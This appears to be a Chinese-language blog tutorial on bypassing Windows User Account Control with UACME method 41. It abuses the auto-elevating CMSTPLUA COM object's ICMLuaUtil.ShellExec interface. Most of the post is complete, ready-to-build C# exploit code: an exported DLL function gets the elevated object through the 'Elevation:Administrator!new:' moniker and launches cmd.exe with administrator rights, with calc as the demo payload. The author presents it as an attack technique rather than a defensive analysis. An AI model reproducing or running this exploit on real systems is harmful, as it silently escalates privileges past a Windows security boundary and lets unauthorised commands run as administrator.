本文主要讲述UACME项目中索引为41的ICMLuaUtil方法为例实现一个bypassuac,该方法原理在于调用COM组件中自动提权并且可以执行命令的接口。
什么类型的COM组件可以利用
以下是UACME项目对使用ICMLuaUtil方式的描述
1Author: Oddvar Moe
2Type: Elevated COM interface
3Method: ICMLuaUtil
4Target(s): Attacker defined
5Component(s): Attacker defined
6Implementation: ucmCMLuaUtilShellExecMethod
7Works from: Windows 7 (7600)
8Fixed in: unfixed ?
9How: -
查看该方法对应的源码发现是CMSTPLUA组件下的ICMLuaUtil接口。使用OleViewDotNet工具以管理员身份运行,查看对应的COM属性信息。
右键查看该组件的Elevation属性
首先这里的Enable、Auto Approval属性为True表示可以用该组件来绕过UAC认证,这是利用条件第一点。
第二点是需要该组件中存在执行命令的点,根据上图知道该函数位于cmlua.dll。通过OleViewDotNet提供的偏移量找到虚函数表。
使用csharp调用ICMLuaUtil.ShellExec执行命令
vs创建新项目,然后添加DllExport类库
装完之后会自动运行一个init.ps1脚本弹出来一个框,让你设置要导出的dll配置。
按图配置,点击apply,然后vs中提示重新加载文件。
先来一个最简单的dll,添加System.Windows.Forms引用之后生成dll
1
2using System;
3using System.Runtime.InteropServices;
4using System.Windows.Forms;
5
6
7namespace MyBypassUAC
8{
9 public class Class1
10 {
11 [DllExport]
12 public static void MyBypassUAC()
13 {
14 MessageBox.Show("aa");
15 }
16 }
17
18}
注意:你需要运行你生成对应系统位数的dll,否则你会碰到这样的错误
运行x64的dll
这样就是一个简单的demo了。接下来写bypassuac的东西。
1using System;
2using System.Runtime.CompilerServices;
3using System.Runtime.InteropServices;
4
5
6namespace MyBypassUAC
7{
8 public class Class1
9 {
10 internal enum HRESULT : long
11 {
12 S_FALSE = 0x0001,
13 S_OK = 0x0000,
14 E_INVALIDARG = 0x80070057,
15 E_OUTOFMEMORY = 0x8007000E
16 }
17
18 [StructLayout(LayoutKind.Sequential)]
19 internal struct BIND_OPTS3
20 {
21 internal uint cbStruct;
22 internal uint grfFlags;
23 internal uint grfMode;
24 internal uint dwTickCountDeadline;
25 internal uint dwTrackFlags;
26 internal uint dwClassContext;
27 internal uint locale;
28 object pServerInfo; // will be passing null, so type doesn't matter
29 internal IntPtr hwnd;
30 }
31
32 [Flags]
33 internal enum CLSCTX
34 {
35 CLSCTX_INPROC_SERVER = 0x1,
36 CLSCTX_INPROC_HANDLER = 0x2,
37 CLSCTX_LOCAL_SERVER = 0x4,
38 CLSCTX_REMOTE_SERVER = 0x10,
39 CLSCTX_NO_CODE_DOWNLOAD = 0x400,
40 CLSCTX_NO_CUSTOM_MARSHAL = 0x1000,
41 CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000,
42 CLSCTX_NO_FAILURE_LOG = 0x4000,
43 CLSCTX_DISABLE_AAA = 0x8000,
44 CLSCTX_ENABLE_AAA = 0x10000,
45 CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000,
46 CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
47 CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER,
48 CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER
49 }
50
51 const ulong SEE_MASK_DEFAULT = 0x0;
52 const ulong SW_SHOW = 0x5;
53
54 [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
55 [return: MarshalAs(UnmanagedType.Interface)]
56 internal static extern object CoGetObject(
57 string pszName,
58 [In] ref BIND_OPTS3 pBindOptions,
59 [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
60
61 [DllExport]
62 public static void MyBypassUAC()
63 {
64 Guid classId_cmstplua = new Guid("3E5FC7F9-9A51-4367-9063-A120244FBEC7");
65 // Interface ID
66 Guid interfaceId_icmluautil = new Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C");
67
68 ICMLuaUtil icm = (ICMLuaUtil)LaunchElevatedCOMObject(classId_cmstplua, interfaceId_icmluautil); ;
69 icm.ShellExec(@"cmd.exe", string.Format("/c {0}", "calc"), @"C:\windows\system32\", SEE_MASK_DEFAULT, SW_SHOW);
70 Marshal.ReleaseComObject(icm);
71 }
72
73 public static object LaunchElevatedCOMObject(Guid Clsid, Guid InterfaceID)
74 {
75 string CLSID = Clsid.ToString("B");
76 string monikerName = "Elevation:Administrator!new:" + CLSID;
77
78 BIND_OPTS3 bo = new BIND_OPTS3();
79 bo.cbStruct = (uint)Marshal.SizeOf(bo);
80 bo.hwnd = IntPtr.Zero;
81 bo.dwClassContext = (int)CLSCTX.CLSCTX_LOCAL_SERVER;
82
83 object retVal = CoGetObject(monikerName, ref bo, InterfaceID);
84
85 return (retVal);
86 }
87
88 [ComImport, Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
89 interface ICMLuaUtil
90 {
91 //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
92 //void QueryInterface([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid, [In, Out] ref IntPtr ppv);
93 //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
94 //void AddRef();
95 //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
96 //void Release();
97 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
98 void Method1();
99 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
100 void Method2();
101 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
102 void Method3();
103 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
104 void Method4();
105 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
106 void Method5();
107 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
108 void Method6();
109 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
110 HRESULT ShellExec(
111 [In, MarshalAs(UnmanagedType.LPWStr)]string file,
112 [In, MarshalAs(UnmanagedType.LPWStr)]string paramaters,
113 [In, MarshalAs(UnmanagedType.LPWStr)]string directory,
114 [In]ulong fMask,
115 [In]ulong nShow);
116 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
117 void Method8();
118 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
119 void Method9();
120 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
121 void Method10();
122 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
123 void Method11();
124 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
125 void Method12();
126 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
127 void Method13();
128 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
129 void Method14();
130 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
131 void Method15();
132 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
133 void Method16();
134 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
135 void Method17();
136 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
137 void Method18();
138 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
139 void Method19();
140 [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
141 void Method20();
142 }
143 }
144}
通过创建ICMLuaUtil com对象icm,调用其方法ShellExec执行命令实现uac提权。
参考
- https://cloud.tencent.com/developer/article/1623517
- https://github.com/cnsimo/BypassUAC/tree/master/BypassUAC_Dll_csharp
- https://github.com/Cn33liz/p0wnedShell/blob/master/p0wnedShell/Opsec/p0wnedMasq.cs
- https://gist.github.com/Moriarty2016/931e86a70aadaf48b067d8a34f28a979
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
评论